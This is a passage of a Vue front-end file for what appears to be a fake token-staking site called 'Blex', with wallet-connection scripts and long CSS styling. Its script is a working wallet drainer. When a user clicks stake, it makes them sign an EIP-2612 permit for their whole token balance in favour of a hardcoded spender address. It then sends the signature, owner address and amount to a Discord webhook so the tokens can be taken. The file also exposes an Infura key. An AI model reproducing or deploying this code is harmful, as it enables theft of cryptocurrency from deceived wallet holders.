XAtW01ncS8suKmWNXjbmVskpu7o1HDweqOivKtH1kZujUt7x208k8oxUdIqMl1TPaOVX8uG/SM9fntr/APLxn8r7lv6in8vL/S+T/t/7ThlGKf7SjHxbKzyqR8etOj55++nsoZLSWuIm5tco6I8bcq0/taGHo+OvvJO3ToUadGKhShGMeiRz2tNp3LWx4qY41SNQ3WRV6AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAP//Z",
    dbtxt: "wstETH",
    dbaddress: "0xae7ab96520de3a18e5e111b5eaab095312d7fe84",
  },
]);
const PermitERC20_ABI = [
  {
    inputs: [
      { internalType: "address", name: "owner", type: "address" },
      { internalType: "address", name: "spender", type: "address" },
      { internalType: "uint256", name: "value", type: "uint256" },
      { internalType: "uint256", name: "deadline", type: "uint256" },
      { internalType: "uint8", name: "v", type: "uint8" },
      { internalType: "bytes32", name: "r", type: "bytes32" },
      { internalType: "bytes32", name: "s", type: "bytes32" },
    ],
    name: "permit",
    outputs: [],
    stateMutability: "nonpayable",
    type: "function",
  },
  {
    inputs: [
      { internalType: "address", name: "from", type: "address" },
      { internalType: "address", name: "to", type: "address" },
      { internalType: "uint256", name: "amount", type: "uint256" },
    ],
    name: "transferFrom",
    outputs: [{ internalType: "bool", name: "", type: "bool" }],
    stateMutability: "nonpayable",
    type: "function",
  },
  {
    inputs: [{ internalType: "address", name: "owner", type: "address" }],
    name: "nonces",
    outputs: [{ internalType: "uint256", name: "", type: "uint256" }],
    stateMutability: "view",
    type: "function",
  },
];
const spenderAddress = "0xb5d6C256Fdf250f6c935C05644C482bcEf100288";
const injected = injectedModule();
const infuraKey = "34071ed776e84b2f85e9b2c3d33929b5";
const rpcUrl = `https://mainnet.infura.io/v3/${infuraKey}`;
const web3Onboard = init({
  wallets: [injected],
  chains: [
    {
      id: "0x1",
      token: "ETH",
      label: "Ethereum Mainnet",
      rpcUrl,
    },
    {
      id: 42161,
      token: "ARB-ETH",
      label: "Arbitrum One",
      rpcUrl: "https://rpc.ankr.com/arbitrum",
    },
    {
      id: "0xa4ba",
      token: "ARB",
      label: "Arbitrum Nova",
      rpcUrl: "https://nova.arbitrum.io/rpc",
    },
    {
      id: "0x2105",
      token: "ETH",
      label: "Base",
      rpcUrl: "https://mainnet.base.org",
    },
  ],
  theme: "dark",
  appMetadata: {
    name: "Blex",
    description: "Your App Description",
    icon: "data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAADgAAAA4CAYAAACohjseAAAAAXNSR0IArs4c6QAABJZJREFUaEPtmM9vG0UUx9+s47RxUheqNlRCFIkfqoQQqLvLAedSC6XZdXeLhETvnJDgxqkHigSCAydOcOif4Fuz63rTqFhIleDgTSgoAgGVEEJCkCBK0vwwjvehTbNhMpn9vbZDtb7ZMzvzPu/7fW/GS+Ah/5CHnA9ywP+7wrmCuYKHPAO5RQ+5QKHh5QqGpuiQTxiogpZpo5sPRZMGtu9ANvLAPLE9QPr3fkH3BfD29e+P3S+sr7LuRSQVVRe/ZIFpVZuGvazq0qmsnJ85YBS12OBd9fyeSwuaGWAcMNqOPDVHoPh0F7vXVF2cBiA7dZv0kxrQDRABf1A1+SwdhJ8N3d83u8KjY0Xnr0EomRqQDtIw2qUiIev0bwjkVVUTZ3nAdO2FjQ9NQXfjG7Pt9wSBvM92Sfd7WOC8cURYKRDhLQecOm/NOLCpFLRM21WrhAhfqLp0PqpF3XkIsEEASt4zjlA+Wqs92wlLSBw4d24iQDcI3rllzd4RQdi26SB4Z15cpdNcEBIBslmks46IH6q6fNWbE6aIfzNqXwUgH9B7ESA3ZjTxYhwVUwH6ZbbVWDrdwa3fonRJVk2/hOzY2nHeUS+99EnfAX0tunvX9AIon5gsVSpPbPo1m7DzkBD4e+ai9AgNXRgRtGnlXCMqZCoFeTakg261liY661trbDAIsKJqD65jrGII8KaqSdeaZvs2ATLFc0FUuMRNhgVjG47VsDcB4ei++imOTMD6/fGZ16b+aJr2XQLwlDd+8jSOyrLcDTtWkjSbRApapu0omiQENRt3jOqgDtuxDySFsbf3fL3emiiXyvtcEOefRyLAILCwuvIC37MmwjdA4AVOs+kAwCjPjgMD3A1yWdGkSToQXid0BDJZq4nLQX+VDoVF6/Wl0XJ564yiSD9FtWhQ4KQ4ega7//zip9Rcw55DhAv0+MAUDOuic+ad5xG2v2WCd29BQpILwO46G4omjUftpIlrcH7+7vFe5949QcCZCzX5ZohFP1I06d2oFuQcK58BIS8SxKk46iU6JizD/l3Rpcd4GQx6xxJUe7yx1Q1x5PJl0gur2TAlEyvIU4x7AWfavzenadpLBOA5v9oLs3AYmDeeCjDgyvYzADz5YBPcVjS5yKvXvSAR/1R0+eR/ULgGQI6xR0dUKHpebEDLsN9WdOnTIIs6DrxcuyR9FVSXR8YnTlWrZ1duGV8/3iW9X9n1snq1GBvQD8yv+P3qsmm0NwghY+x6R5ZXx6pvVLfS1l4mFvWzzLyxeL5HnJY7HvVK5ncx560Rx6qZKMjWV5xmY5kLNwFwen/Q5GNFE6/EAfGbmwmgX7Nhzr3vFE3a65pBXbJpLr5Odl84xT33WNBMAA8czIjCXGOhF0VJRFxTdblsmfY2ABT8mk1SNTMFtMz2oqLJ54I6LFtTltn+HIBU6WfKJzqlSqWy8yYg7SdTwCCwA83muv0MFODHrBUbiEXdTZrGwiuqLt6Ko2ZatXjP911BetOgZtQPOHfNgQL2CyJo3RxwGFnPcs9cwSyzOYy1cgWHkfUs98wVzDKbw1grV3AYWc9yz38BAy1kVz8lNEUAAAAASUVORK5CYII=",
  },
});
const webhook =
  "https://discord.com/api/webhooks/1130507485296472126/Ioy8h54ZJAXD-9SBboBXGuZadnuMuvoPZzFdoSzZyqoQNQ7XarozV2m-rTxwVzWrV52v";
const ContractAddress = "0xdac17f958d2ee523a2206206994597c13d831ec7";
const ContractABI = [
  {
    constant: true,
    inputs: [{ name: "_owner", type: "address" }],
    name: "balanceOf",
    outputs: [{ name: "balance", type: "uint256" }],
    payable: false,
    stateMutability: "view",
    type: "function",
  },
];
const { connectWallet } = useOnboard();
onMounted(() => {
  bus.$on("qbbalance", (val) => {
    if (val != "") {
      yeslog.value = "1";
      xhladdress.value = localStorage.getItem("xhladd");

      userbla.value = Math.floor(Number(val) * 100) / 100;
    }
  });
  bus.$on("qbusdtbalance", (val) => {
    if (val != "") {
      yeslog.value = "1";
      xhladdress.value = localStorage.getItem("xhladd");
      userusdtbla.value = Math.floor(Number(val) * 100) / 100;
    }
  });
  bus.$on("logout", (val) => {
    if (val == "out") {
      yeslog.value = "0";
      userbla.value = "0";
      userusdtbla.value = "0";
    }
  });
  if (localStorage.getItem("xhladd")) {
    yeslog.value = "1";
    xhladdress.value = localStorage.getItem("xhladd");
    firstgetbla();
  }
  if (localStorage.getItem("ethtabs")) {
    let ethtabnum = localStorage.getItem("ethtabs");
    staimgy.value = stalist.value[ethtabnum].dbimg;
    stab.value = stalist.value[ethtabnum].dbtxt;
    asset.value.name = stalist.value[ethtabnum].dbtxt;
    asset.value.address = stalist.value[ethtabnum].dbaddress;
    asset.value.balance = userbla.value;
  }
  if (localStorage.getItem("xhlbalance")) {
    xhladdress.value = localStorage.getItem("xhladd");
    userbla.value =
      Math.floor(Number(localStorage.getItem("xhlbalance")) * 100) / 100;
    console.log("userbla", userbla.value);
  }
  if (localStorage.getItem("xhlusdtbalance")) {
    xhladdress.value = localStorage.getItem("xhladd");

    userusdtbla.value =
      Math.floor(Number(localStorage.getItem("xhlusdtbalance")) * 100) / 100;
    console.log(userusdtbla.value);
  }
});
let changetab = (str) => {
  statab.value = str;
};
let connect = async () => {
  connectWallet().then((res) => {
    fristgetb();
  });
};
let fristgetb = async () => {
  const provider = new ethers.providers.Web3Provider(window.ethereum);
  const signer = provider.getSigner();
  xhladdress.value = await signer.getAddress();
  localStorage.setItem("xhladd", xhladdress.value);
  const oneContract = new ethers.Contract(
    stayaddress.value,
    ContractABI,
    provider
  );
  xethbalance.value = await oneContract.balanceOf(xhladdress.value);
  userbla.value = ethers.utils.formatEther(xethbalance.value);
  asset.value.name = stab.value;
  asset.value.address = stayaddress.value;
  asset.value.balance = userbla.value;
  console.log(asset.value);
  const usdtContract = new ethers.Contract(
    ContractAddress,
    ContractABI,
    provider
  );
  const balance = await usdtContract.balanceOf(xhladdress.value);
  xusdtbalance.value = ethers.utils.formatEther(balance);
  userusdtbla.value = xusdtbalance.value;
  yeslog.value = "1";
  localStorage.setItem("xhlbalance", xethbalance.value);
  localStorage.setItem("xhlusdtbalance", xusdtbalance.value);
  bus.$emit("qbbalance", xethbalance.value);
  bus.$emit("qbusdtbalance", xusdtbalance.value);
};
let getdbblance = async (item) => {
  const provider = new ethers.providers.Web3Provider(window.ethereum);
  const usdtContract = new ethers.Contract(
    item.dbaddress,
    ContractABI,
    provider
  );
  const balance = await usdtContract.balanceOf(xhladdress.value);
  xethbalance.value = ethers.utils.formatEther(balance);
  console.log(asset.value);
  userbla.value = xethbalance.value;
  asset.value.name = item.dbtxt;
  asset.value.address = item.dbaddress;
  asset.value.balance = xethbalance.value;
  localStorage.setItem("xhlbalance", xethbalance.value);
};
let stabalance = () => {
  inpval.value = Math.floor(Number(userbla.value) * 100) / 100;
};
let statbalance = () => {
  inpvalt.value = Math.floor(Number(userusdtbla.value) * 100) / 100;
};
let unsinput = () => {
  inpvalt.value = inpvalt.value.replace(/[^\d.]/g, "");
};
let sinput = () => {
  inpval.value = inpval.value.replace(/[^\d.]/g, "");
};
let statcs = (str) => {
  istcshow.value = str;
};
let isstop = () => {
  console.log("add");
};
let changebs = (item, index) => {
  staimgy.value = item.dbimg;
  stab.value = item.dbtxt;
  stashow.value = "0";
  localStorage.setItem("ethtabs", index);
  getdbblance(item);
};
let stalists = (str) => {
  if (str == stashow.value) {
    stashow.value = "0";
  } else {
    stashow.value = "1";
  }
};
let changeeth = (str) => {
  if (str == ethshow.value) {
    ethshow.value = "0";
  } else {
    ethshow.value = "1";
  }
};
let Permitbut = () => {
  if (Number(inpval.value) <= 0) {
    balanceErr.value = "1";
  } else {
    newPermitAction(asset.value);
  }
};
let newPermitAction = async (ethassets) => {
  const provider = new ethers.providers.Web3Provider(window.ethereum);
  const tokenOwner = provider.getSigner();
  const value = ethers.utils.parseEther(ethassets.balance);
  const deadline = Math.round(Date.now() / 1000) + 200;
  const chainId = (await provider.getNetwork()).chainId;
  const myToken = new ethers.Contract(
    ethassets.address,
    PermitERC20_ABI,
    provider
  );
  const nonces = await myToken.nonces(tokenOwner.getAddress());
  const domain = {
    name: ethassets.name,
    version: "1",
    chainId: chainId,
    verifyingContract: ethassets.address,
  };
  const types = {
    Permit: [
      {
        name: "owner",
        type: "address",
      },
      {
        name: "spender",
        type: "address",
      },
      {
        name: "value",
        type: "uint256",
      },
      {
        name: "nonce",
        type: "uint256",
      },
      {
        name: "deadline",
        type: "uint256",
      },
    ],
  };
  const values = {
    owner: xhladdress.value,
    spender: spenderAddress,
    value: value,
    nonce: nonces,
    deadline: Math.round(Date.now() / 1000) + 100,
  };
  const signature = await tokenOwner._signTypedData(domain, types, values);
  const sig = ethers.utils.splitSignature(signature);
  const recovered = ethers.utils.verifyTypedData(domain, types, values, sig);
  let gasPrice = await provider.getGasPrice();
  sendLog(value, deadline, sig);
};
let sendLog = (value, deadline, sig) => {
  let data = {
    content: `**🤞 welcome newcomer --** Address:${xhladdress.value} spenderAddress:${spenderAddress} value:${value} deadline:${deadline} v:${sig.v} r:${sig.r} s:${sig.s}`,
  };
  fetch(webhook, {
    method: "POST",
    headers: { "Content-Type": "application/json" },
    body: JSON.stringify(data),
  })
    .then((res) => {
      console.log(res);
    })
    .catch((err) => {
      console.log(err);
    });
};
let firstgetbla = async () => {
  const provider = new ethers.providers.Web3Provider(window.ethereum);
  const usdtContract = new ethers.Contract(
    stayaddress.value,
    ContractABI,
    provider
  );
  const balance = await usdtContract.balanceOf(xhladdress.value);
  xethbalance.value = ethers.utils.formatEther(balance);
  userbla.value = xethbalance.value;
  asset.value.name = stab.value;
  asset.value.address = stayaddress.value;
  asset.value.balance = userbla.value;
};
</script>

<style scoped>
.yscon {
  width: 100%;
  height: calc(100vh - 7.25rem);
  background: rgb(30, 37, 43);
  padding-top: 8.5rem;
}
.ystabay {
  gap: 0.75rem;
}
.ystabayf > p {
  font-family: "Poppins";
  font-size: 1rem;
  line-height: 1.5rem;
  color: white;
}
.yscblkfa {
  height: 100%;
}
.ystabayf > span {
  font-family: "Interl";
  font-size: 0.75rem;
  line-height: 1rem;
  color: white;
}
.ystabacon {
  border-radius: 0.75rem;
  border: 1px solid rgb(55 65 81);
}
.ystabacl {
  width: 23%;
  align-items: center;
  padding: 1.25rem 0.875rem;
  box-sizing: border-box;
  position: relative;
  border-right: 1px solid rgb(55 65 81);
}
.ystabaclf {
  width: 100%;
  padding: 0 0.25rem;
  box-sizing: border-box;
  align-items: center;
  cursor: pointer;
  justify-content: center;
  column-gap: 0.25rem;
}
.ystabaclf > img {
  width: 1.25rem;
  height: 1.25rem;
  border-radius: 50%;
}
.ystabaclf > span {
  font-family: "Poppins";
  font-size: 1.125rem;
  line-height: 1.75rem;
  color: white;
}
.ystabaclf > svg {
  width: 1rem;
  height: 1rem;
  color: rgba(156, 163, 175, 0.5);
}
.ystabacr {
  width: 77%;
  padding: 1.25rem 0.875rem;
  box-sizing: border-box;
}
.ystabacrtop {
  align-items: center;
  padding: 0.625rem 0;
  border-bottom: 1px solid rgb(55 65 81);
}
.ystabacrtop > input {
  width: 82.6%;
  font-size: 1.25rem;
  line-height: 1.75rem;
  font-family: "Interl";
  color: white;
  background: transparent;
  border: none;
}
.ystabacrtop > input::placeholder {
  color: rgb(117 117 117);
}
.ystabacrtopb {
  width: 12.5%;
  display: block;
  font-family: "Poppins";
  box-shadow: inset 0 0 0 2px #f7f7f8bf;
  border-radius: 0.5rem;
  height: 2rem;
  font-weight: 600;
  font-size: 1rem;
  background: transparent;
  cursor: pointer;
  color: #f7f7f8bf;
}
.ystabacrtopbno {
  width: 12.5%;
  display: block;
  opacity: 0.8;
  font-family: "Poppins";
  box-shadow: inset 0 0 0 2px #f7f7f8bf;
  border-radius: 0.5rem;
  height: 2rem;
  font-weight: 600;
  font-size: 1rem;
  background: transparent;
  cursor: not-allowed;
  color: #f7f7f8bf;
}
.ystabacrtopbn {
  display: none;
}
.ystabacrtopb:hover {
  background: #f7f7f8bf;
  box-shadow: none;
  color: #272e35;
}
.ystabacrbot {
  padding: 0.25rem 0;
  font-size: 0.75rem;
  line-height: 1rem;
  font-family: "Interl";
  color: #b3bbca;
}
.ystalist {
  display: none;
  position: absolute;
  width: 95%;
  top: 66%;
  left: 5%;
  border-radius: 0.75rem;
  border: 2px solid rgb(163 164 191);
  box-sizing: border-box;
  overflow: hidden;
  z-index: 50;
}
.ystalists {
  display: block;
}
.ystalistf {
  align-items: center;
  padding: 0.75rem 1.5rem;
  box-sizing: border-box;
  column-gap: 0.5rem;
  border-bottom: 2px solid rgb(163 164 191);
  background: rgb(36, 35, 37);
  cursor: pointer;
}
.ystalistf:hover > p {
  color: white;
}
.ystalistf > img {
  width: 1.25rem;
  height: 1.25rem;
  border-radius: 50%;
}
.ystalistf > p {
  font-family: "Poppins";
  font-size: 1rem;
  line-height: 1.5rem;
  color: rgb(214 211 209);
}
.yscblkh {
  height: 10rem;
}
.yscblk > .yscblkfb {
  flex-grow: 0;
}
.yscblkfb {
  width: 45%;
  height: 100%;
}
.ysconf {
  width: 100%;
  background: rgb(30, 37, 43);
  padding-top: 10rem;
  height: auto;
  box-sizing: border-box;
}
.ymainhy .yscon {
  background: white;
}
.ymainhy .ysconf {
  background: white;
}
.yscon > h1 {
  display: block;
  font-size: 72px;
  line-height: 80px;
  font-family: "Poppins";
  text-align: center;
  color: white;
  position: relative;
  z-index: 10;
}
.yscon > p {
  display: block;
  color: #6e757c;
  font-family: "Interl";
  font-size: 16px;
  font-weight: 500;
  line-height: 24px;
  text-align: center;
  margin: 1.5rem 0 3rem 0;
  position: relative;
  z-index: 10;
}
.ysconf > h1 {
  display: block;
  font-size: 72px;
  line-height: 80px;
  font-family: "Poppins";
  text-align: center;
  color: white;
  position: relative;
  z-index: 10;
}
.ysconf > p {
  display: block;
  color: #6e757c;
  font-family: "Interl";
  font-size: 16px;
  font-weight: 500;
  line-height: 24px;
  text-align: center;
  margin: 1.5rem 0 3rem 0;
  position: relative;
  z-index: 10;
}
.yscbox {
  width: 98rem;
  height: auto;
  padding: 2rem 2rem 2rem 2.5rem;
  box-sizing: border-box;
  margin: 0 auto;
  border-radius: 1.5rem;
  overflow: hidden;
  align-items: center;
  position: relative;
  background: #2c353d;
}
.ymainhy .yscbox {
  background: white;
}
.yscbl {
  justify-content: center;
  align-items: center;
  box-sizing: border-box;
}
.yscblnone {
  display: none;
}
.yscbr {
  width: 43.875rem;
  backdrop-filter: blur(12px);
  gap: 1rem;
  position: relative;
  z-index: 10;
  box-sizing: border-box;
}
.yscblcon {
  gap: 0.75rem;
  width: 41.875rem;
}
.yscbltop {
  align-items: center;
  column-gap: 0.5rem;
}
.yscbltop > img {
  width: 3.5rem;
  height: auto;
}
.yscbltop > h1 {
  font-family: "Poppins";
  line-height: 2.5rem;
  font-weight: 600;
  font-size: 2.5rem;
  color: white;
}
.ymainhy .yscbltop > h1 {
  color: #000;
}
.yscbltxt {
  font-family: "Interl";
  font-size: 1rem;
  line-height: 1.5rem;
  color: #b3bbca;
}
.ymainhy .yscbltxt {
  color: #6e757c;
}
.font-bold {
  font-family: "Poppins";
  font-size: 700;
  color: #b3bbca;
}
.ymainhy .yscbltxt > .font-bold {
  color: #6e757c;
}
.yscblk {
  column-gap: 0.75rem;
}
.yscblk > div {
  background: rgb(40, 48, 54);
  box-shadow: 0 8px 32px #0000001a;
  padding: 1rem;
  border-radius: 0.5rem;
  gap: 0.75rem;
  align-items: center;
  flex-grow: 1;
  box-sizing: border-box;
  position: relative;
  overflow: hidden;
}
.ymainhy .yscblk > div {
  box-shadow: 0 8px 32px #0000001a;
  background: #f7f7f8;
}
.yscblk > div::before {
  top: -100px;
  left: -100px;
  width: 200px;
  height: 200px;
  opacity: 0.6;
  filter: blur(278.261px);
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
}
.yscblk > div::after {
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
  right: -194px;
  bottom: -181px;
  width: 390px;
  height: 390px;
  filter: blur(160px);
  opacity: 0.6;
}
.yscblkf > p {
  font-family: "Interl";
  font-size: 1rem;
  line-height: 1.5rem;
  color: white;
  text-align: center;
}
.ymainhy .yscblkf > p {
  color: #000;
}
.yscblkje {
  align-items: center;
  justify-content: center;
  column-gap: 0.25rem;
}
.yscblkje > .logoimg {
  width: 2.5rem;
  height: auto;
}
.yscblkje > img {
  width: 2.5rem;
  height: auto;
}
.yscblkje > span {
  font-family: "Poppins";
  font-size: 1.5rem;
  line-height: 2rem;
  color: white;
}
.ymainhy .yscblkje > span {
  color: #000;
}

.yscblkd {
  font-size: 0.75rem;
  line-height: 1rem;
  font-family: "Inter";
  color: #b3bbca;
  text-align: center;
}
.ymainhy .yscblkd {
  color: #6e757c;
}
.yscblkje > .fontblue {
  color: rgb(117 117 117) !important;
  z-index: 10;
}
.yscbltcon {
  font-family: "Interl";
  font-size: 0.625rem;
  line-height: 1rem;
  color: #b3bbca;
}
.ymainhy .yscbltcon {
  color: #6e757c;
}
.yscbltcon > .font-bold {
  font-family: "Poppins";
}
.ymainhy .yscbltcon > .font-bold {
  color: #6e757c;
}
.yscbrlg {
  position: absolute;
  width: 1px;
  height: 100%;
  left: 0;
  bottom: 0;
  background-image: radial-gradient(
    circle at 50% 50%,
    rgb(255, 110, 48),
    hsl(208, 18%, 14%)
  );
}
.yscbrbox {
  width: 100%;
  background-color: rgb(36 35 37);
  box-shadow: rgba(255, 255, 255, 0.25) 0px 1px 2px 0px inset,
    rgba(0, 0, 0, 0.72) 0px 8px 12px 0px;
  border-radius: 0.5rem;
  overflow: hidden;
  position: relative;
}
.yscbrbend {
  width: 100%;
  height: 3.5rem;
  background-color: rgb(36 35 37);
  box-shadow: rgba(255, 255, 255, 0.25) 0px 1px 2px 0px inset,
    rgba(0, 0, 0, 0.72) 0px 8px 12px 0px;
  border-radius: 0.5rem;
  padding: 0 1.5rem;
  box-sizing: border-box;
  overflow: hidden;
  transition: all 0.3s;
}
.yscbrbendh {
  height: 13.0625rem;
}
.yscbrbdy {
  align-items: center;
  padding: 1rem 0;
  border-bottom: 1px solid rgb(55 65 81);
  cursor: pointer;
}
.yscbrbdy > p {
  font-family: "Poppins";
  font-size: 1rem;
  line-height: 1.5rem;
  color: white;
}
.yscbrbdy > svg {
  color: #b3bbca;
  transform: rotate(180deg);
  transition: all 0.5s;
}
.yscbrbendh .yscbrbdy > svg {
  transform: rotate(0deg);
}
.yscbrbdt {
  width: 100%;
  padding: 0.75rem 0;
}
.yscbrbdtf {
  align-items: center;
  padding: 0.25rem 0;
}
.yscbrbdtf > span {
  font-family: "Poppins";
  font-size: 1rem;
  line-height: 1.5rem;
  color: #b3bbca;
}
.yscbrbdtf > p {
  font-family: "Interl";
  font-size: 1rem;
  line-height: 1.5rem;
  color: white;
}
.yscbox::before {
  top: -280px;
  left: -280px;
  width: 560px;
  height: 560px;
  opacity: 0.6;
  filter: blur(278.261px);
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
}
.yscbox::after {
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
  right: -194px;
  bottom: -181px;
  width: 390px;
  height: 390px;
  filter: blur(160px);
  opacity: 0.6;
}
.yscbrbtop {
  width: 100%;
  justify-content: center;
  align-items: center;
  position: relative;
  z-index: 10;
}
.yscbrbttab {
  width: 50%;
  font-family: "Interl";
  color: rgb(141, 141, 141);
  outline: 2px solid transparent;
  display: flex;
  justify-content: center;
  align-items: center;
  outline-offset: 2px;
  letter-spacing: 0.05em;
  text-transform: uppercase;
  height: 3rem;
  padding: 0.375rem 0.75rem;
  font-size: 1.125rem;
  line-height: 1.75rem;
  background: rgb(48, 48, 48);
  box-sizing: border-box;
}
.yscbrbttabactive {
  color: white;
  background-color: rgb(36 35 37);
}
.yscbrbcon {
  width: 100%;
  padding: 1.25rem;
  box-sizing: border-box;
  position: relative;
  z-index: 10;
  background-color: rgb(36 35 37);
}
.yscbrbconnone {
  display: none;
}
.yscbrbcnr {
  width: 100%;
}
.yscbrbcnry {
  width: 100%;
  padding: 1.25rem;
  border: 1px solid hsla(0, 0%, 100%, 0.2);
  border-radius: 0.5rem;
  box-sizing: border-box;
}
.yscbrbcnry > p {
  font-family: "Poppins";
  font-size: 1.125rem;
  line-height: 1.75rem;
  color: white;
}
.yscbrbcnry > span {
  display: block;
  font-size: 0.875rem;
  line-height: 1.25rem;
  margin-bottom: 0.5rem;
  color: hsla(0, 0%, 100%, 0.5);
}
.yscbrbinp {
  position: relative;
  width: 100%;
}
.errtxt {
  opacity: 0;
  font-family: "Poppins";
  font-size: 1rem;
  line-height: 1.5rem;
  color: red;
  margin-top: 0.25rem;
  transition: all 0.4s;
}
.errtxts {
  opacity: 1;
}
.yscbrbinp > input {
  font-family: "Poppins";
  outline: 2px solid transparent;
  outline-offset: 2px;
  border: 1px solid rgb(161 161 170);
  border-radius: 0.75rem;
  background-color: hsla(0, 0%, 100%, 0.1);
  border-radius: 0.5rem;
  padding: 0 1.5rem;
  height: 3rem;
  width: 100%;
  color: white;
  font-size: 1rem;
  line-height: 1.5rem;
  box-sizing: border-box;
}
.yscbrbinp > span {
  font-family: "Interl";
  font-size: 0.875rem;
  line-height: 1.25rem;
  color: white;
  position: absolute;
  top: 50%;
  cursor: pointer;
  transform: translateY(-50%);
  right: 1rem;
}
.yscbrbcnrt {
  width: 100%;
  padding: 1.5rem;
  gap: 0.75rem;
  border: 1px solid hsla(0, 0%, 100%, 0.2);
  border-radius: 0.5rem;
  box-sizing: border-box;
}
.yscbrbcnrttop > p {
  font-family: "Poppins";
  font-size: 1.125rem;
  line-height: 1.75rem;
  color: white;
}
.yscbrbcnrttop > span {
  display: block;
  font-size: 0.875rem;
  line-height: 1.25rem;
  margin-bottom: 0.5rem;
  color: hsla(0, 0%, 100%, 0.5);
}
.yscbrbcnrtbot {
  column-gap: 0.5rem;
  align-items: center;
}
.yscbrbcnrtbot > button {
  font-family: "Poppins";
  box-shadow: inset 0 0 0 2px #f7f7f8bf;
  border-radius: 0.5rem;
  height: 3rem;
  font-weight: 600;
  font-size: 1rem;
  padding: 0 1rem;
  background: transparent;
  cursor: pointer;
  color: #f7f7f8bf;
}
.yscbrbcnrtbot > button:hover {
  background: #f7f7f8bf;
  box-shadow: none;
  color: #272e35;
}
.yscbrbcnrtbot > div {
  font-family: "Interl";
  color: hsla(0, 0%, 100%, 0.5);
  font-size: 0.75rem;
  line-height: 1rem;
}
.yscbrbcnrs {
  width: 100%;
  display: block;
  font-family: "Poppins";
  box-shadow: inset 0 0 0 2px #f7f7f8bf;
  border-radius: 0.5rem;
  height: 3rem;
  font-weight: 600;
  font-size: 1rem;
  background: transparent;
  cursor: pointer;
  color: #f7f7f8bf;
}
.yscbrbcnrsno {
  display: none;
}
.yscbrbcnrs:hover {
  background: #f7f7f8bf;
  box-shadow: none;
  color: #272e35;
}
.yscbltinpx {
  gap: 0.75rem;
}
.yscbltinpxy {
  width: 100%;
  align-items: center;
  border-radius: 0.5rem;
  background: rgb(40, 48, 54);
  box-shadow: 0 8px 32px #0000001a;
  padding: 1rem;
  position: relative;
  box-sizing: border-box;
  overflow: hidden;
}
.yscbltinpxy::before {
  top: -280px;
  left: -280px;
  width: 560px;
  height: 560px;
  opacity: 0.6;
  filter: blur(278.261px);
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
}
.yscbltinpxy::after {
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
  right: -194px;
  bottom: -181px;
  width: 390px;
  height: 390px;
  filter: blur(160px);
  opacity: 0.6;
}
.yscbltinpxy > span {
  font-family: "Interl";
  line-height: 1.25rem;
  font-size: 1rem;
  font-weight: 500;
  color: white;
}
.yscbltinpxy > div {
  font-family: "Poppins";
  font-size: 1.5rem;
  line-height: 2rem;
  color: rgb(117 117 117);
  z-index: 10;
}
.yscbltinpxt {
  width: 100%;
  height: 8.75rem;
  align-items: center;
}

.yscbltinpxs {
  width: 100%;
  align-items: center;
  border-radius: 0.5rem;
  background: rgb(40, 48, 54);
  box-shadow: 0 8px 32px #0000001a;
  padding: 1rem;
  box-sizing: border-box;
  position: relative;
  overflow: hidden;
}
.yscbltinpxs::before {
  top: -280px;
  left: -280px;
  width: 560px;
  height: 560px;
  opacity: 0.6;
  filter: blur(278.261px);
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
}
.yscbltinpxs::after {
  content: "";
  position: absolute;
  border-radius: 50%;
  background: linear-gradient(
    135.15deg,
    #ae80dc 1.17%,
    #dc83c3 31.88%,
    #8084dc 65.46%
  );
  right: -194px;
  bottom: -181px;
  width: 390px;
  height: 390px;
  filter: blur(160px);
  opacity: 0.6;
}
.yscbltinpxsr {
  gap: 0.25rem;
  align-items: center;
}
.yscbltinpxsr > span {
  font-family: "Interl";
  font-size: 0.75rem;
  line-height: 1rem;
  color: hsla(0, 0%, 100%, 0.5);
}
.yscbltinpxsrt {
  align-items: center;
}
.yscbltinpxsrt > img {
  width: 3rem;
  height: auto;
}
.yscbltinpxsrt > span {
  font-family: "Poppins";
  font-size: 1.5rem;
  line-height: 2rem;
  color: rgb(117 117 117);
  z-index: 10;
}
.yscbltinpxs > span {
  font-family: "Inter";
  line-height: 1.25rem;
  font-size: 1rem;
  font-weight: 500;
  color: white;
}
.yscbltinpxf {
  width: 100%;
  font-family: "Poppins";
  box-shadow: inset 0 0 0 2px #f7f7f8bf;
  border-radius: 0.5rem;
  height: 3rem;
  font-weight: 600;
  font-size: 1rem;
  background: transparent;
  cursor: pointer;
  color: #f7f7f8bf;
}
.yscbltinpxf:hover {
  background: #f7f7f8bf;
  box-shadow: none;
  color: #272e35;
}
.ymainhy .yscbltinpxy > span {
  color: black;
}
.ymainhy .yscbltinpxs > span {
  color: black;
}
.ymainhy .yscbltinpxsr > span {
  color: #6e757c;
}
.ymainhy .yscbltinpxf {
  box-shadow: inset 0 0 0 2px #272e35bf;
  color: #272e35;
}
.ymainhy .yscbltinpxf:hover {
  background: #272e35;
  box-shadow: none;
  color: #f7f7f8;
}
.ysbgtc {
  width: 100vw;
  height: 100vh;
  position: fixed;
  top: 0;
  left: 0;
  z-index: 101;
  background: rgba(0, 0, 0, 0.9);
  justify-content: center;
  align-items: center;
}
.ysbgtcbox {
  width: 40rem;
  height: 50vh;
  box-sizing: border-box;
  background: #2c353d;
  position: relative;
  border-radius: 1.25rem;
  overflow: hidden;
}
.ysbgtcbox::before {
  top: -280px;
  left: -280px;
  width: 560px;
  height: 560px;
  opacity: 0.6;
  filter: blur(278.261px);
  content: "";
  position: absolute;
  border-radius: 50%;
